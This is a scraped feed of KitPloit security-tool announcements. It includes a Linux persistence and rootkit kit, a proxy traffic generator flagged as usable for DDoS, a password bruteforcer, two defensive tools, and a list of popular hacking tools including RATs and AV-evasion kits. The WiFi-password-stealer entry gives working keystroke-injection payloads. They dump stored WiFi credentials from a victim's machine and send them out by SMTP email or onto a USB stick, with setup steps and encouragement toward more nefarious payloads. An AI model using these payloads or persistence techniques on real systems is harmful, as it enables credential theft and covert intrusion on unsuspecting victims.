FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

D3m0n1z3dShell - Demonized Shell Is An Advanced Tool For Persistence In Linux

By: Zion3R


Demonized Shell is an Advanced Tool for persistence in linux.


Install

git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh

One-Liner Install

Download D3m0n1z3dShell with all files:

curl -L https://github.com/MatheuZSecurity/D3m0n1z3dShell/archive/main.tar.gz | tar xz && cd D3m0n1z3dShell-main && sudo ./demonizedshell.sh

Load D3m0n1z3dShell statically (without the static-binaries directory):

sudo curl -s https://raw.githubusercontent.com/MatheuZSecurity/D3m0n1z3dShell/main/static/demonizedshell_static.sh -o /tmp/demonizedshell_static.sh && sudo bash /tmp/demonizedshell_static.sh

Demonized Features

  • Auto Generate SSH keypair for all users
  • APT Persistence
  • Crontab Persistence
  • Systemd User level
  • Systemd Root Level
  • Bashrc Persistence
  • Privileged user & SUID bash
  • LKM Rootkit Modified, Bypassing rkhunter & chkrootkit
  • LKM Rootkit With file encoder. persistent icmp backdoor and others features.
  • ICMP Backdoor
  • LD_PRELOAD Setup PrivEsc
  • Static Binaries For Process Monitoring, Dump credentials, Enumeration, Trolling and Others Binaries.

Pending Features

  • LD_PRELOAD Rootkit
  • Process Injection
  • install for example: curl github.com/test/test/demonized.sh | bash
  • Static D3m0n1z3dShell
  • Intercept Syscall Write from a file
  • ELF/Rootkit Anti-Reversing Technique
  • PAM Backdoor
  • rc.local Persistence
  • init.d Persistence
  • motd Persistence
  • Persistence via php webshell and aspx webshell

And other types of features that will come in the future.

Contribution

If you want to contribute and help with the tool, please contact me on twitter: @MatheuzSecurity

Note

We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.



PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

By: Zion3R


PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

Features:

  • Utilizes a list of proxy IP addresses from a specified file.
  • Supports both HTTP and HTTPS proxies.
  • Allows users to input the target website URL, proxy file path, and a static port.
  • Makes HTTP requests to the specified website using each proxy.
  • Parses HTML content to extract and visit links on the webpage.

Usage:

  • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
  • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
  • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
  • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
  • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

Get New Proxies with port and add in proxies.txt in this format 50.168.163.176:80
  • You can add it from here: https://free-proxy-list.net/ these free proxies are not validated some might not work so first validate these proxies before adding.

How to Use:

  1. Clone the repository:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
  1. Install dependencies:
pip3 install -r requirements.txt
  1. Run the script:
python3 PhantomCrawler.py

Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


Snapshots:

If you find this GitHub repo useful, please consider giving it a star! 



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


Top 20 Most Popular Hacking Tools in 2023

By: Zion3R

As last year, this year we made a ranking with the most popular tools between January and December 2023.

The tools of this year encompass a diverse range of cybersecurity disciplines, including AI-Enhanced Penetration Testing, Advanced Vulnerability Management, Stealth Communication Techniques, Open-Source General Purpose Vulnerability Scanning, and more.

Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2023:


  1. PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


  2. Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


  3. Faraday - Open Source Vulnerability Management Platform


  4. CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare


  5. Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools


  6. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


  7. Waf-Bypass - Check Your WAF Before An Attacker Does


  8. PentestGPT - A GPT-empowered Penetration Testing Tool


  9. Sirius - First Truly Open-Source General Purpose Vulnerability Scanner


  10. LSMS - Linux Security And Monitoring Scripts


  11. GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM


  12. Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403


  13. ThunderCloud - Cloud Exploit Framework


  14. GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


  15. Kscan - Simple Asset Mapping Tool


  16. RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry


  17. DNSWatch - DNS Traffic Sniffer and Analyzer


  18. IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


  19. TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions


  20. XSS-Exploitation-Tool - An XSS Exploitation Tool





Happy New Year wishes the KitPloit team!


VED-eBPF - Kernel Exploit And Rootkit Detection Using eBPF

By: Zion3R


VED (Vault Exploit Defense)-eBPF leverages eBPF (extended Berkeley Packet Filter) to implement runtime kernel security monitoring and exploit detection for Linux systems.

Introduction

eBPF is an in-kernel virtual machine that allows code execution in the kernel without modifying the kernel source itself. eBPF programs can be attached to tracepoints, kprobes, and other kernel events to efficiently analyze execution and collect data.

VED-eBPF uses eBPF to trace security-sensitive kernel behaviors and detect anomalies that could indicate an exploit or rootkit. It provides two main detections:

  • wCFI (Control Flow Integrity) traces the kernel call stack to detect control flow hijacking attacks. It works by generating a bitmap of valid call sites and validating each return address matches a known callsite.

  • PSD (Privilege Escalation Detection) traces changes to credential structures in the kernel to detect unauthorized privilege escalations.


How it Works

VED-eBPF attaches eBPF programs to kernel functions to trace execution flows and extract security events. The eBPF programs submit these events via perf buffers to userspace for analysis.

wCFI

wCFI traces the call stack by attaching to functions specified on the command line. On each call, it dumps the stack, assigns a stack ID, and validates the return addresses against a precomputed bitmap of valid call sites generated from objdump and /proc/kallsyms.

If an invalid return address is detected, indicating a corrupted stack, it generates a wcfi_stack_event containing:

* Stack trace
* Stack ID
* Invalid return address

This security event is submitted via perf buffers to userspace.

The wCFI eBPF program also tracks changes to the stack pointer and kernel text region to keep validation up-to-date.

PSD

PSD traces credential structure modifications by attaching to functions like commit_creds and prepare_kernel_cred. On each call, it extracts information like:

* Current process credentials
* Hashes of credentials and user namespace
* Call stack

It compares credentials before and after the call to detect unauthorized changes. If an illegal privilege escalation is detected, it generates a psd_event containing the credential fields and submits it via perf buffers.

Prerequsites

VED-eBPF requires:

  • Linux kernel v5.17+ (tested on v5.17)
  • eBPF support enabled
  • BCC toolkit

Current Status

VED-eBPF is currently a proof-of-concept demonstrating the potential for eBPF-based kernel exploit and rootkit detection. Ongoing work includes:

  • Expanding attack coverage
  • Performance optimization
  • Additional kernel versions
  • Integration with security analytics

Conclusion

VED-eBPF shows the promise of eBPF for building efficient, low-overhead kernel security monitoring without kernel modification. By leveraging eBPF tracing and perf buffers, critical security events can be extracted in real-time and analyzed to identify emerging kernel threats for cloud native envionrment.



Legba - A Multiprotocol Credentials Bruteforcer / Password Sprayer And Enumerator

By: Zion3R


Legba is a multiprotocol credentials bruteforcer / password sprayer and enumerator built with Rust and the Tokio asynchronous runtime in order to achieve better performances and stability while consuming less resources than similar tools (see the benchmark below).

For the building instructions, usage and the complete list of options check the project Wiki.


Supported Protocols/Features:

AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace), Cassandra/ScyllaDB, DNS subdomain enumeration, FTP, HTTP (basic authentication, NTLMv1, NTLMv2, multipart form, custom requests with CSRF support, files/folders enumeration, virtual host enumeration), IMAP, Kerberos pre-authentication and user enumeration, LDAP, MongoDB, MQTT, Microsoft SQL, MySQL, Oracle, PostgreSQL, POP3, RDP, Redis, SSH / SFTP, SMTP, STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ), TCP port scanning, Telnet, VNC.

Benchmark

Here's a benchmark of legba versus thc-hydra running some common plugins, both targeting the same test servers on localhost. The benchmark has been executed on a macOS laptop with an M1 Max CPU, using a wordlist of 1000 passwords with the correct one being on the last line. Legba was compiled in release mode, Hydra compiled and installed via brew formula.

Far from being an exhaustive benchmark (some legba features are simply not supported by hydra, such as CSRF token grabbing), this table still gives a clear idea of how using an asynchronous runtime can drastically improve performances.

Test Name Hydra Tasks Hydra Time Legba Tasks Legba Time
HTTP basic auth 16 7.100s 10 1.560s ( 4.5x faster)
HTTP POST login (wordpress) 16 14.854s 10 5.045s ( 2.9x faster)
SSH 16 7m29.85s * 10 8.150s ( 55.1x faster)
MySQL 4 ** 9.819s 4 ** 2.542s ( 3.8x faster)
Microsoft SQL 16 7.609s 10 4.789s ( 1.5x faster)

* While this result would suggest a default delay between connection attempts used by Hydra. I've tried to study the source code to find such delay but to my knowledge there's none. For some reason it's simply very slow.
** For MySQL hydra automatically reduces the amount of tasks to 4, therefore legba's concurrency level has been adjusted to 4 as well.

License

Legba is released under the GPL 3 license. To see the licenses of the project dependencies, install cargo license with cargo install cargo-license and then run cargo license.



Metahub - An Automated Contextual Security Findings Enrichment And Impact Evaluation Tool For Vulnerability Management

By: Zion3R


MetaHub is an automated contextual security findings enrichment and impact evaluation tool for vulnerability management. You can use it with AWS Security Hub or any ASFF-compatible security scanner. Stop relying on useless severities and switch to impact scoring definitions based on YOUR context.


MetaHub is an open-source security tool for impact-contextual vulnerability management. It can automate the process of contextualizing security findings based on your environment and your needs: YOUR context, identifying ownership, and calculate an impact scoring based on it that you can use for defining prioritization and automation. You can use it with AWS Security Hub or any ASFF security scanners (like Prowler).

MetaHub describe your context by connecting to your affected resources in your affected accounts. It can describe information about your AWS account and organization, the affected resources tags, the affected CloudTrail events, your affected resource configurations, and all their associations: if you are contextualizing a security finding affecting an EC2 Instance, MetaHub will not only connect to that instance itself but also its IAM Roles; from there, it will connect to the IAM Policies associated with those roles. It will connect to the Security Groups and analyze all their rules, the VPC and the Subnets where the instance is running, the Volumes, the Auto Scaling Groups, and more.

After fetching all the information from your context, MetaHub will evaluate certain important conditions for all your resources: exposure, access, encryption, status, environment and application. Based on those calculations and in addition to the information from the security findings affecting the resource all together, MetaHub will generate a Scoring for each finding.

Check the following dashboard generated by MetaHub. You have the affected resources, grouping all the security findings affecting them together and the original severity of the finding. After that, you have the Impact Score and all the criteria MetaHub evaluated to generate that score. All this information is filterable, sortable, groupable, downloadable, and customizable.



You can rely on this Impact Score for prioritizing findings (where should you start?), directing attention to critical issues, and automating alerts and escalations.

MetaHub can also filter, deduplicate, group, report, suppress, or update your security findings in automated workflows. It is designed for use as a CLI tool or within automated workflows, such as AWS Security Hub custom actions or AWS Lambda functions.

The following is the JSON output for a an EC2 instance; see how MetaHub organizes all the information about its context together, under associations, config, tags, account cloudtrail, and impact



Context

In MetaHub, context refers to information about the affected resources like their configuration, associations, logs, tags, account, and more.

MetaHub doesn't stop at the affected resource but analyzes any associated or attached resources. For instance, if there is a security finding on an EC2 instance, MetaHub will not only analyze the instance but also the security groups attached to it, including their rules. MetaHub will examine the IAM roles that the affected resource is using and the policies attached to those roles for any issues. It will analyze the EBS attached to the instance and determine if they are encrypted. It will also analyze the Auto Scaling Groups that the instance is associated with and how. MetaHub will also analyze the VPC, Subnets, and other resources associated with the instance.

The Context module has the capability to retrieve information from the affected resources, affected accounts, and every associated resources. The context module has five main parts: config (which includes associations as well), tags, cloudtrail, and account. By default config and tags are enabled, but you can change this behavior using the option --context (for enabling all the context modules you can use --context config tags cloudtrail account). The output of each enabled key will be added under the affected resource.

Config

Under the config key, you can find anyting related to the configuration of the affected resource. For example, if the affected resource is an EC2 Instance, you will see keys like private_ip, public_ip, or instance_profile.

You can filter your findings based on Config outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Associations

Under the associations key, you will find all the associated resources of the affected resource. For example, if the affected resource is an EC2 Instance, you will find resources like: Security Groups, IAM Roles, Volumes, VPC, Subnets, Auto Scaling Groups, etc. Each time MetaHub finds an association, it will connect to the associated resource again and fetch its own context.

Associations are key to understanding the context and impact of your security findings as their exposure.

You can filter your findings based on Associations outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Tags

MetaHub relies on AWS Resource Groups Tagging API to query the tags associated with your resources.

Note that not all AWS resource type supports this API. You can check supported services.

Tags are a crucial part of understanding your context. Tagging strategies often include:

  • Environment (like Production, Staging, Development, etc.)
  • Data classification (like Confidential, Restricted, etc.)
  • Owner (like a team, a squad, a business unit, etc.)
  • Compliance (like PCI, SOX, etc.)

If you follow a proper tagging strategy, you can filter and generate interesting outputs. For example, you could list all findings related to a specific team and provide that data directly to that team.

You can filter your findings based on Tags outputs using the option: --mh-filters-tags TAG=VALUE. See Tags Filtering

CloudTrail

Under the key cloudtrail, you will find critical Cloudtrail events related to the affected resource, such as creating events.

The Cloudtrail events that we look for are defined by resource type, and you can add, remove or change them by editing the configuration file resources.py.

For example for an affected resource of type Security Group, MetaHub will look for the following events:

  • CreateSecurityGroup: Security Group Creation event
  • AuthorizeSecurityGroupIngress: Security Group Rule Authorization event.

Account

Under the key account, you will find information about the account where the affected resource is runnning, like if it's part of an AWS Organizations, information about their contacts, etc.

Ownership

MetaHub also focuses on ownership detection. It can determine the owner of the affected resource in various ways. This information can be used to automatically assign a security finding to the correct owner, escalate it, or make decisions based on this information.

An automated way to determine the owner of a resource is critical for security teams. It allows them to focus on the most critical issues and escalate them to the right people in automated workflows. But automating workflows this way, it is only viable if you have a reliable way to define the impact of a finding, which is why MetaHub also focuses on impact.

Impact

The impact module in MetaHub focuses on generating a score for each finding based on the context of the affected resource and all the security findings affecting them. For the context, we define a series of evaluated criteria; you can add, remove, or modify these criteria based on your needs. The Impact criteria are combined with a metric generated based on all the Security Findings affecting the affected resource and their severities.

The following are the impact criteria that MetaHub evaluates by default:

Exposure

Exposure evaluates the how the the affected resource is exposed to other networks. For example, if the affected resource is public, if it is part of a VPC, if it has a public IP or if it is protected by a firewall or a security group.

Possible Statuses Value Description
 effectively-public 100% The resource is effectively public from the Internet.
 restricted-public 40% The resource is public, but there is a restriction like a Security Group.
 unrestricted-private 30% The resource is private but unrestricted, like an open security group.
 launch-public 10% These are resources that can launch other resources as public. For example, an Auto Scaling group or a Subnet.
 restricted 0% The resource is restricted.
 unknown - The resource couldn't be checked

Access

Access evaluates the resource policy layer. MetaHub checks every available policy including: IAM Managed policies, IAM Inline policies, Resource Policies, Bucket ACLS, and any association to other resources like IAM Roles which its policies are also analyzed . An unrestricted policy is not only an itsue itself of that policy, it afected any other resource which is using it.

Possible Statuses Value Description
 unrestricted 100% The principal is unrestricted, without any condition or restriction.
 untrusted-principal 70% The principal is an AWS Account, not part of your trusted accounts.
 unrestricted-principal 40% The principal is not restricted, defined with a wildcard. It could be conditions restricting it or other restrictions like s3 public blocks.
 cross-account-principal 30% The principal is from another AWS account.
 unrestricted-actions 30% The actions are defined using wildcards.
 dangerous-actions 30% Some dangerous actions are defined as part of this policy.
 unrestricted-service 10% The policy allows an AWS service as principal without restriction.
 restricted 0% The policy is restricted.
 unknown - The policy couldn't be checked.

Encryption

Encryption evaluate the different encryption layers based on each resource type. For example, for some resources it evaluates if at_rest and in_transit encryption configuration are both enabled.

Possible Statuses Value Description
 unencrypted 100% The resource is not fully encrypted.
 encrypted 0% The resource is fully encrypted including any of it's associations.
 unknown - The resource encryption couldn't be checked.

Status

Status evaluate the status of the affected resource in terms of attachment or functioning. For example, for an EC2 Instance we evaluate if the resource is running, stopped, or terminated, but for resources like EBS Volumes and Security Groups, we evaluate if those resources are attached to any other resource.

Possible Statuses Value Description
 attached 100% The resource supports attachment and is attached.
 running 100% The resource supports running and is running.
 enabled 100% The resource supports enabled and is enabled.
 not-attached 0% The resource supports attachment, and it is not attached.
 not-running 0% The resource supports running and it is not running.
 not-enabled 0% The resource supports enabled and it is not enabled.
 unknown - The resource couldn't be checked for status.

Environment

Environment evaluates the environment where the affected resource is running. By default, MetaHub defines 3 environments: production, staging, and development, but you can add, remove, or modify these environments based on your needs. MetaHub evaluates the environment based on the tags of the affected resource, the account id or the account alias. You can define your own environemnts definitions and strategy in the configuration file (See Customizing Configuration).

Possible Statuses Value Description
 production 100% It is a production resource.
 staging 30% It is a staging resource.
 development 0% It is a development resource.
 unknown - The resource couldn't be checked for enviroment.

Application

Application evaluates the application that the affected resource is part of. MetaHub relies on the AWS myApplications feature, which relies on the Tag awsApplication, but you can extend this functionality based on your context for example by defining other tags you use for defining applications or services (like Service or any other), or by relying on account id or alias. You can define your application definitions and strategy in the configuration file (See Customizing Configuration).

Possible Statuses Value Description
 unknown - The resource couldn't be checked for application.

Findings Soring

As part of the impact score calculation, we also evaluate the total ammount of security findings and their severities affecting the resource. We use the following formula to calculate this metric:

(SUM of all (Finding Severity / Highest Severity) with a maximum of 1)

For example, if the affected resource has two findings affecting it, one with HIGH and another with LOW severity, the Impact Findings Score will be:

SUM(HIGH (3) / CRITICAL (4) + LOW (0.5) / CRITICAL (4)) = 0.875

Architecture

MetaHub reads your security findings from AWS Security Hub or any ASFF-compatible security scanner. It then queries the affected resources directly in the affected account to provide additional context. Based on that context, it calculates it's impact. Finally, it generates different outputs based on your needs.



Use Cases

Some use cases for MetaHub include:

  • MetaHub integration with Prowler as a local scanner for context enrichment
  • Automating Security Hub findings suppression based on Tagging
  • Integrate MetaHub directly as Security Hub custom action to use it directly from the AWS Console
  • Created enriched HTML reports for your findings that you can filter, sort, group, and download
  • Create Security Hub Insights based on MetaHub context

Features

MetaHub provides a range of ways to list and manage security findings for investigation, suppression, updating, and integration with other tools or alerting systems. To avoid Shadowing and Duplication, MetaHub organizes related findings together when they pertain to the same resource. For more information, refer to Findings Aggregation

MetaHub queries the affected resources directly in the affected account to provide additional context using the following options:

  • Config: Fetches the most important configuration values from the affected resource.
  • Associations: Fetches all the associations of the affected resource, such as IAM roles, security groups, and more.
  • Tags: Queries tagging from affected resources
  • CloudTrail: Queries CloudTrail in the affected account to identify who created the resource and when, as well as any other related critical events
  • Account: Fetches extra information from the account where the affected resource is running, such as the account name, security contacts, and other information.

MetaHub supports filters on top of these context* outputs to automate the detection of other resources with the same issues. You can filter security findings affecting resources tagged in a certain way (e.g., Environment=production) and combine this with filters based on Config or Associations, like, for example, if the resource is public, if it is encrypted, only if they are part of a VPC, if they are using a specific IAM role, and more. For more information, refer to Config filters and Tags filters for more information.

But that's not all. If you are using MetaHub with Security Hub, you can even combine the previous filters with the Security Hub native filters (AWS Security Hub filtering). You can filter the same way you would with the AWS CLI utility using the option --sh-filters, but in addition, you can save and re-use your filters as YAML files using the option --sh-template.

If you prefer, With MetaHub, you can back enrich your findings directly in AWS Security Hub using the option --enrich-findings. This action will update your AWS Security Hub findings using the field UserDefinedFields. You can then create filters or Insights directly in AWS Security Hub and take advantage of the contextualization added by MetaHub.

When investigating findings, you may need to update security findings altogether. MetaHub also allows you to execute bulk updates to AWS Security Hub findings, such as changing Workflow Status using the option --update-findings. As an example, you identified that you have hundreds of security findings about public resources. Still, based on the MetaHub context, you know those resources are not effectively public as they are protected by routing and firewalls. You can update all the findings for the output of your MetaHub query with one command. When updating findings using MetaHub, you also update the field Note of your finding with a custom text for future reference.

MetaHub supports different Output Modes, some of them json based like json-inventory, json-statistics, json-short, json-full, but also powerfull html, xlsx and csv. These outputs are customizable; you can choose which columns to show. For example, you may need a report about your affected resources, adding the tag Owner, Service, and Environment and nothing else. Check the configuration file and define the columns you need.

MetaHub supports multi-account setups. You can run the tool from any environment by assuming roles in your AWS Security Hub master account and your child/service accounts where your resources live. This allows you to fetch aggregated data from multiple accounts using your AWS Security Hub multi-account implementation while also fetching and enriching those findings with data from the accounts where your affected resources live based on your needs. Refer to Configuring Security Hub for more information.

Customizing Configuration

MetaHub uses configuration files that let you customize some checks behaviors, default filters, and more. The configuration files are located in lib/config/.

Things you can customize:

  • lib/config/configuration.py: This file contains the default configuration for MetaHub. You can change the default filters, the default output modes, the environment definitions, and more.

  • lib/config/impact.py: This file contains the values and it's weights for the impact formula criteria. You can modify the values and the weights based on your needs.

  • lib/config/reources.py: This file contains definitions for every resource type, like which CloudTrail events to look for.

Run with Python

MetaHub is a Python3 program. You need to have Python3 installed in your system and the required Python modules described in the file requirements.txt.

Requirements can be installed in your system manually (using pip3) or using a Python virtual environment (suggested method).

Run it using Python Virtual Environment

  1. Clone the repository: git clone git@github.com:gabrielsoltz/metahub.git
  2. Change to repostiory dir: cd metahub
  3. Create a virtual environment for this project: python3 -m venv venv/metahub
  4. Activate the virtual environment you just created: source venv/metahub/bin/activate
  5. Install Metahub requirements: pip3 install -r requirements.txt
  6. Run: ./metahub -h
  7. Deactivate your virtual environment after you finish with: deactivate

Next time, you only need steps 4 and 6 to use the program.

Alternatively, you can run this tool using Docker.

Run with Docker

MetaHub is also available as a Docker image. You can run it directly from the public Docker image or build it locally.

The available tagging for MetaHub containers are the following:

  • latest: in sync with master branch
  • <x.y.z>: you can find the releases here
  • stable: this tag always points to the latest release.

For running from the public registry, you can run the following command:

docker run -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

AWS credentials and Docker

If you are already logged into the AWS host machine, you can seamlessly use the same credentials within a Docker container. You can achieve this by either passing the necessary environment variables to the container or by mounting the credentials file.

For instance, you can run the following command:

docker run -e AWS_DEFAULT_REGION -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

On the other hand, if you are not logged in on the host machine, you will need to log in again from within the container itself.

Build and Run Docker locally

Or you can also build it locally:

git clone git@github.com:gabrielsoltz/metahub.git
cd metahub
docker build -t metahub .
docker run -ti metahub ./metahub -h

Run with Lambda

